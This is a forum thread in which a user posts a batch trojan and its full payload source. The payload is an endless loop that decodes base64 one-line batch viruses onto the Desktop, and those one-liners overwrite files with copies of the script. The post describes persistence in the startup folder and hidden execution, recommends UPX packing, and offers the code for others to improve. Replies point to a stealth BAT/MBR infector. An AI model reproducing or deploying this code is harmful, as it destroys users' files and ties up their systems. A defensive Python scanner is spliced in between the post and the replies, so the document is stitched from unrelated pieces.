1 (edited by RCV5 2017-01-20 20:58:56)

Topic: Self-extracting Batch Trojan

This is a batch trojan that decodes a UTF-8 encoded executable file (a compiled batch file to be more specific) that has some simple one-line batch viruses encoded into it that are also encoded with UTF-8. I got the idea from the batch version of the MEMZ trojan which acts like a self extracting archive in the sense that it extracts MEMZ.exe to the roaming appdata folder. I used the cipher built into windows (certutil) to decode and encode the files into UTF-8 encoding rather than the javascript cipher the MEMZ trojan used. The executable file it has encoded into it extracts itself into the startup folder and runs hidden so you won't see a massive cmd window when it's running. The payload is very simple, it creates simple one line batch viruses on the desktop which are extremely easy for antivirus software to detect, which, in turn, causes the antivirus software to constantly be working to remove them which takes up a lot of memory and cpu usage. Clearly, you could make your own compiled batch file and have it decode that instead but I decided to keep this simple. I'm hoping that people will improve upon these codes. The actual trojan is too long to fit in this post so I could only include the payload for people who copy and paste. The attached file contains both the uncompiled payload and the actual trojan. I would recommend converting the trojan to an executable file and compressing with UPX. Enjoy!

Payload:
@echo off
:a
echo Zm9yICUlYiBpbiAoKi4qKSBkbyBjb3B5ICUwICUlYg > "%temp%\tmp1A7b.tmp"
echo Zm9yICUlYSBpbiAoKi5iYXQpIGRvIGNvcHkgJTAgJSVh > "%temp%\tmp1A8b.tmp"
echo Zm9yICUlYiBpbiAoKi5iYXQpIGRvIGNvcHkgJTAgJSVi > "%temp%\tmp1A9b.tmp"
timeout>nul /nobreak /t 0
certutil>nul -decode "%temp%\tmp1A7b.tmp" "%userprofile%\Desktop\%random%.bat"
certutil>nul -decode "%temp%\tmp1A8b.tmp" "%userprofile%\Desktop\%random%.bat"
certutil>nul -decode "%temp%\tmp1A9b.tmp" "%userprofile%\Desktop\%random%.bat"
del "%temp%\tmp1A7b.tmp"
del "%temp%\tmp1A8b.tmp"
del "%temp%\tmp1A9b.tmp"
goto a


Disclaimer: I am not responsible for anything you do with these files, the codes, or any of the information provided in this post. I am uploading this for educational purposes only and strongly advise against running any of these files or codes except on a virtual machine you deem fit for testing purposes. You have been warned.

Post's attachments

INFECTED.zip 35.12 kb, 18 downloads since 2017-01-20 


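Added example, not part of the post or its attachment: a small Python scanner written from the detection side that flags the structure the post describes in a .bat file (a base64 literal echoed into %temp%, certutil -decode run on that staged file, a drop into a user-facing folder, and a backward goto loop). The sample batch text, the regexes and the finding names are my own assumptions; the encoded string in the sample is a harmless placeholder.

```python
import base64
import re

# Constructed sample mirroring the shape of the payload above (base64 echoed into
# %temp%, certutil -decode to the Desktop, delete, loop); harmless placeholder text.
STAGED = base64.b64encode(b"echo harmless placeholder").decode()
SAMPLE_BAT = rf"""@echo off
:a
echo {STAGED} > "%temp%\tmp1A7b.tmp"
certutil>nul -decode "%temp%\tmp1A7b.tmp" "%userprofile%\Desktop\%random%.bat"
del "%temp%\tmp1A7b.tmp"
goto a
"""

ECHO_B64 = re.compile(r'^\s*echo\s+([A-Za-z0-9+/]{16,}={0,2})\s*>+\s*("[^"]+"|\S+)', re.I)
CERTUTIL = re.compile(r'certutil\S*\s+(?:\S+\s+)*?-decode\s+("[^"]+"|\S+)\s+("[^"]+"|\S+)', re.I)
LABEL = re.compile(r'^\s*:(\w+)')
GOTO = re.compile(r'^\s*goto\s+:?(\w+)', re.I)
USER_DROP = re.compile(r'\\(desktop|startup)\\|%random%', re.I)

def scan_batch(text):
    # Returns (kind, line number, detail) tuples for each suspicious construct found.
    findings, staged, labels = [], set(), {}
    for n, line in enumerate(text.splitlines(), 1):
        if m := LABEL.match(line):
            labels[m.group(1).lower()] = n
        elif m := ECHO_B64.match(line):
            path = m.group(2).strip('"')
            try:  # only count the literal if it really is valid base64
                base64.b64decode(m.group(1), validate=True)
            except ValueError:  # binascii.Error is a ValueError subclass
                continue
            staged.add(path.lower())
            findings.append(("staged_base64", n, path))
        elif m := CERTUTIL.search(line):
            src, dst = (g.strip('"') for g in m.groups())
            kind = "certutil_decode_staged" if src.lower() in staged else "certutil_decode"
            findings.append((kind, n, f"{src} -> {dst}"))
            if USER_DROP.search(dst):
                findings.append(("drop_to_user_location", n, dst))
        elif m := GOTO.match(line):
            tgt = m.group(1).lower()
            if labels.get(tgt, n) < n:  # jump back to an earlier label: unbounded loop
                findings.append(("backward_goto_loop", n, f":{tgt} at line {labels[tgt]}"))
    return findings

def is_suspicious(findings):
    # Decoding a staged base64 file inside a self-loop is the shape the post describes.
    kinds = {k for k, _, _ in findings}
    return "certutil_decode_staged" in kinds and "backward_goto_loop" in kinds
```

Running scan_batch over the sample reports the four constructs in order; a plain certutil -decode with no staged file and no loop is reported but not judged suspicious.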

Re: Self-extracting Batch Trojan

Maybe you would like to see Dark Angels virus 'Blah' in 40-hex. It also encodes itself as ASCII, it is a full stealth BAT/MBR infector.

----
JPanic - Johnny Panic
Ex Immortal Riot/Genesis, NOP, Team MiSSiON
@JPanicVX on Twitter


Re: Self-extracting Batch Trojan

Send me the link and I will check it out. Thanks!


Re: Self-extracting Batch Trojan

RCV5 wrote:

Send me the link and I will check it out. Thanks!

http://hackipedia.org/Operating%20Syste … .utf-8.txt

Source: http://www.textfiles.com/magazines/40HEX/40hex014

+1 me!

----
JPanic - Johnny Panic
Ex Immortal Riot/Genesis, NOP, Team MiSSiON
@JPanicVX on Twitter
